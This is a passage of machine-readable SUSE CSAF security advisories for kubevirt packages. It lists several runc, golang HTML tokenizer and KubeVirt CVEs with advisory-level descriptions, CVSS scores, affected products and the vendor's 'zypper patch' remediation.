"category": "self",
"summary": "SUSE CVE CVE-2025-22872 page",
"url": "https://www.suse.com/security/cve/CVE-2025-22872/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64324 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64324/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64432 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64432/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64433 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64433/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64434 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64434/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64435 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64435/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64437 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64437/"
}
],
"title": "Security update for kubevirt",
"tracking": {
"current_release_date": "2026-02-27T08:49:48Z",
"generator": {
"date": "2026-02-27T08:49:48Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:20551-1",
"initial_release_date": "2026-02-27T08:49:48Z",
"revision_history": [
{
"date": "2026-02-27T08:49:48Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-manifests-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Micro 6.2",
"product": {
"name": "SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles:16:16.0:transactional"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-manifests-1.7.0-160000.1.1.x86_64 as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64 as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-45310",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-45310"
}
],
"notes": [
{
"category": "general",
"text": "runc is a CLI tool for spawning and running containers according to the OCI specification. runc 1.1.13 and earlier, as well as 1.2.0-rc2 and earlier, can be tricked into creating empty files or directories in arbitrary locations in the host filesystem by sharing a volume between two containers and exploiting a race with `os.MkdirAll`. While this could be used to create empty files, existing files would not be truncated. An attacker must have the ability to start containers using some kind of custom volume configuration. Containers using user namespaces are still affected, but the scope of places an attacker can create inodes can be significantly reduced. Sufficiently strict LSM policies (SELinux/Apparmor) can also in principle block this attack -- we suspect the industry standard SELinux policy may restrict this attack\u0027s scope but the exact scope of protection hasn\u0027t been analysed. This is exploitable using runc directly as well as through Docker and Kubernetes. The issue is fixed in runc v1.1.14 and v1.2.0-rc3.\n\nSome workarounds are available. Using user namespaces restricts this attack fairly significantly such that the attacker can only create inodes in directories that the remapped root user/group has write access to. Unless the root user is remapped to an actual\nuser on the host (such as with rootless containers that don\u0027t use `/etc/sub[ug]id`), this in practice means that an attacker would only be able to create inodes in world-writable directories. A strict enough SELinux or AppArmor policy could in principle also restrict the scope if a specific label is applied to the runc runtime, though neither the extent to which the standard existing policies block this attack nor what exact policies are needed to sufficiently restrict this attack have been thoroughly tested.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-45310",
"url": "https://www.suse.com/security/cve/CVE-2024-45310"
},
{
"category": "external",
"summary": "SUSE Bug 1230092 for CVE-2024-45310",
"url": "https://bugzilla.suse.com/1230092"
},
{
"category": "external",
"summary": "SUSE Bug 1257413 for CVE-2024-45310",
"url": "https://bugzilla.suse.com/1257413"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.6,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "low"
}
],
"title": "CVE-2024-45310"
},
{
"cve": "CVE-2025-22872",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-22872"
}
],
"notes": [
{
"category": "general",
"text": "The tokenizer incorrectly interprets tags with unquoted attribute values that end with a solidus character (/) as self-closing. When directly using Tokenizer, this can result in such tags incorrectly being marked as self-closing, and when using the Parse functions, this can result in content following such tags as being placed in the wrong scope during DOM construction, but only when tags are in foreign content (e.g. \u003cmath\u003e, \u003csvg\u003e, etc contexts).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-22872",
"url": "https://www.suse.com/security/cve/CVE-2025-22872"
},
{
"category": "external",
"summary": "SUSE Bug 1241710 for CVE-2025-22872",
"url": "https://bugzilla.suse.com/1241710"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-22872"
},
{
"cve": "CVE-2025-64324",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64324"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. The `hostDisk` feature in KubeVirt allows mounting a host file or directory owned by the user with UID 107 into a VM. However, prior to version 1.6.1 and 1.7.0, the implementation of this feature and more specifically the `DiskOrCreate` option (which creates a file if it doesn\u0027t exist) has a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users on the host system. Versions 1.6.1 and 1.7.0 fix the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64324",
"url": "https://www.suse.com/security/cve/CVE-2025-64324"
},
{
"category": "external",
"summary": "SUSE Bug 1253748 for CVE-2025-64324",
"url": "https://bugzilla.suse.com/1253748"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "important"
}
],
"title": "CVE-2025-64324"
},
{
"cve": "CVE-2025-64432",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64432"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Versions 1.5.3 and below, and 1.6.0 contained a flawed implementation of the Kubernetes aggregation layer\u0027s authentication flow which could enable bypass of RBAC controls. It was discovered that the virt-api component fails to correctly authenticate the client when receiving API requests over mTLS. In particular, it fails to validate the CN (Common Name) field in the received client TLS certificates against the set of allowed values defined in the extension-apiserver-authentication configmap. Failre to validate certain fields in the client TLS certificate may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component. This issue is fixed in versions 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64432",
"url": "https://www.suse.com/security/cve/CVE-2025-64432"
},
{
"category": "external",
"summary": "SUSE Bug 1253181 for CVE-2025-64432",
"url": "https://bugzilla.suse.com/1253181"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-64432"
},
{
"cve": "CVE-2025-64433",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64433"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, a vulnerability was discovered that allows a VM to read arbitrary files from the virt-launcher pod\u0027s file system. This issue stems from improper symlink handling when mounting PVC disks into a VM. Specifically, if a malicious user has full or partial control over the contents of a PVC, they can create a symbolic link that points to a file within the virt-launcher pod\u0027s file system. Since libvirt can treat regular files as block devices, any file on the pod\u0027s file system that is symlinked in this way can be mounted into the VM and subsequently read. Although a security mechanism exists where VMs are executed as an unprivileged user with UID 107 inside the virt-launcher container, limiting the scope of accessible resources, this restriction is bypassed due to a second vulnerability. The latter causes the ownership of any file intended for mounting to be changed to the unprivileged user with UID 107 prior to mounting. As a result, an attacker can gain access to and read arbitrary files located within the virt-launcher pod\u0027s file system or on a mounted PVC from within the guest VM. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64433",
"url": "https://www.suse.com/security/cve/CVE-2025-64433"
},
{
"category": "external",
"summary": "SUSE Bug 1253185 for CVE-2025-64433",
"url": "https://bugzilla.suse.com/1253185"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-64433"
},
{
"cve": "CVE-2025-64434",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64434"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance, could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances potentially compromising the integrity and availability of the VM managed by it. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64434",
"url": "https://www.suse.com/security/cve/CVE-2025-64434"
},
{
"category": "external",
"summary": "SUSE Bug 1253186 for CVE-2025-64434",
"url": "https://bugzilla.suse.com/1253186"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-64434"
},
{
"cve": "CVE-2025-64435",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64435"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.7.0-beta.0, a logic flaw in the virt-controller allows an attacker to disrupt the control over a running VMI by creating a pod with the same labels as the legitimate virt-launcher pod associated with the VMI. This can mislead the virt-controller into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service). This vulnerability is fixed in 1.7.0-beta.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64435",
"url": "https://www.suse.com/security/cve/CVE-2025-64435"
},
{
"category": "external",
"summary": "SUSE Bug 1253189 for CVE-2025-64435",
"url": "https://bugzilla.suse.com/1253189"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-64435"
},
{
"cve": "CVE-2025-64437",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64437"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. In versions before 1.5.3 and 1.6.1, the virt-handler does not verify whether the launcher-sock is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host. To successfully exploit this vulnerability, an attacker should be in control of the file system of the virt-launcher pod. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64437",
"url": "https://www.suse.com/security/cve/CVE-2025-64437"
},
{
"category": "external",
"summary": "SUSE Bug 1253194 for CVE-2025-64437",
"url": "https://bugzilla.suse.com/1253194"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.9,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "low"
}
],
"title": "CVE-2025-64437"
}
]
}
SUSE-SU-2025:4330-1
Vulnerability from csaf_suse - Published: 2025-12-09 11:33 - Updated: 2025-12-09 11:33Summary
Security update for kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container, virt-pr-helper-container
Notes
Title of the patch
Security update for kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container, virt-pr-helper-container
Description of the patch
This update for kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container, virt-pr-helper-container fixes the following issues:
Updated kubevirt to version 1.6.3:
- CVE-2025-22872: Fixed incorrect interpretation of tags leading content to be placed wrong scope during DOM
construction in golang.org/x/net/html (bsc#1241772)
- CVE-2025-64432: Fixed bypass of RBAC controls due to incorrect validation of certain fields in the client
TLS certificate (bsc#1253181)
- CVE-2025-64433: Fixed arbitrary files read via improper symlink handling (bsc#1253185)
- CVE-2025-64434: Fixed privilege escalation via virt-api impersonification due to compromise virt-handler
instance (bsc#1253186)
- CVE-2025-64437: Fixed mishandling of symlinks (bsc#1253194)
- CVE-2025-64324: Fixed a logic bug that allows an attacker to read and write arbitrary files owned by more
privileged users (bsc#1253748)
Patchnames
SUSE-2025-4330,SUSE-SLE-Module-Containers-15-SP7-2025-4330
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container, virt-pr-helper-container",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container, virt-pr-helper-container fixes the following issues:\n\nUpdated kubevirt to version 1.6.3:\n\n - CVE-2025-22872: Fixed incorrect interpretation of tags leading content to be placed wrong scope during DOM \n construction in golang.org/x/net/html (bsc#1241772)\n - CVE-2025-64432: Fixed bypass of RBAC controls due to incorrect validation of certain fields in the client\n TLS certificate (bsc#1253181)\n - CVE-2025-64433: Fixed arbitrary files read via improper symlink handling (bsc#1253185)\n - CVE-2025-64434: Fixed privilege escalation via virt-api impersonification due to compromise virt-handler\n instance (bsc#1253186)\n - CVE-2025-64437: Fixed mishandling of symlinks (bsc#1253194)\n - CVE-2025-64324: Fixed a logic bug that allows an attacker to read and write arbitrary files owned by more\n privileged users (bsc#1253748)\n\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2025-4330,SUSE-SLE-Module-Containers-15-SP7-2025-4330",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2025_4330-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2025:4330-1",
"url": "https://www.suse.com/support/update/announcement/2025/suse-su-20254330-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2025:4330-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2025-December/023449.html"
},
{
"category": "self",
"summary": "SUSE Bug 1241772",
"url": "https://bugzilla.suse.com/1241772"
},
{
"category": "self",
"summary": "SUSE Bug 1250683",
"url": "https://bugzilla.suse.com/1250683"
},
{
"category": "self",
"summary": "SUSE Bug 1253181",
"url": "https://bugzilla.suse.com/1253181"
},
{
"category": "self",
"summary": "SUSE Bug 1253185",
"url": "https://bugzilla.suse.com/1253185"
},
{
"category": "self",
"summary": "SUSE Bug 1253186",
"url": "https://bugzilla.suse.com/1253186"
},
{
"category": "self",
"summary": "SUSE Bug 1253194",
"url": "https://bugzilla.suse.com/1253194"
},
{
"category": "self",
"summary": "SUSE Bug 1253384",
"url": "https://bugzilla.suse.com/1253384"
},
{
"category": "self",
"summary": "SUSE Bug 1253748",
"url": "https://bugzilla.suse.com/1253748"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-22872 page",
"url": "https://www.suse.com/security/cve/CVE-2025-22872/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64324 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64324/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64432 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64432/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64433 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64433/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64434 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64434/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64437 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64437/"
}
],
"title": "Security update for kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container, virt-pr-helper-container",
"tracking": {
"current_release_date": "2025-12-09T11:33:55Z",
"generator": {
"date": "2025-12-09T11:33:55Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2025:4330-1",
"initial_release_date": "2025-12-09T11:33:55Z",
"revision_history": [
{
"date": "2025-12-09T11:33:55Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-container-disk-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-container-disk-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-container-disk-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-manifests-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-tests-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-tests-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-tests-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-api-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-api-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-api-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-controller-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-controller-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-controller-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-handler-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-handler-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-handler-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-operator-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-operator-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-operator-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.aarch64",
